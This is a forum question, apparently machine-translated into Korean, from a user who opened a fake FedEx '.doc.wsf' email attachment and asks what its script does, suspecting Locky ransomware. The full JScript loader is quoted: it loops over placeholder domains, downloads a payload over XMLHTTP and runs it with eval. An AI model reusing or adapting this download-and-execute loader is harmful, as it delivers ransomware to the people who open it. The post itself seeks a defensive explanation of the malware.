0
"FedEx 패키지를 배달하지 못 했으므로 .doc 첨부 파일"을 최근 열었습니다. 최근에 물건을 온라인으로 주문한 이후로 내가 바보 인 것처럼 보이기 때문에 첨부 파일을 열어 두었습니다. 다행히도 "filename.doc.wsf"를 여는 데 아무런 해를 입지 않으므로 Linux를 사용하고있었습니다. 나는 그 일에 포함 된 다음 발췌 문장이 정확히 무엇을하려고하는지 궁금해한다.다음 .wsf 이메일 공격이 정확히 무엇을하려고합니까?
Google 검색에 따르면 최종 목표는 Windows 시스템에 Locky라는 악성 코드를 설치하는 것입니다. 맬웨어가 다운로드하려고하는 다른 도메인은 배열 x []에 나열되며 for 루프 내부의 처음 몇 줄은 미리보기에서 전체 URL을 구성하는 것처럼 보입니다. (나는 그것이 스팸 탐지를 피하기 위해 세분화되었다고 가정합니다.) 그러나 "시도"에서 시작하여 나는 계속 진행되고있는 일을 따라갈 수 없습니다.
<job><script language=JScript>
var x = new Array("DOMAIN1.com","DOMAIN2.ru","ftp.DOMAIN3.com","DOMAIN4.ru","DOMAIN5.com");
var y = "Msxml2.XMLHTTP";
for (var i=0; i<5; i++)
{
x[i] = "http://" + x[i];
x[i] += "/co";
x[i] += "unter/";
x[i] += "?a=0.34960858&i=rRMDdRYvgD1oBqvgMjMaHDglAgtoQ1d6_hYJEPEXmzddhBr8QbsIrfboGHt9FZlWF53OH-6Q8M45bw";
try {
var z = new ActiveXObject(y);
z.open("GET", x[i], false);
z.send();
if (z.status == 200)
{
eval(z.responseText.split("~").join("a"));
break;
};
}
catch(e) { };
};
</script></job>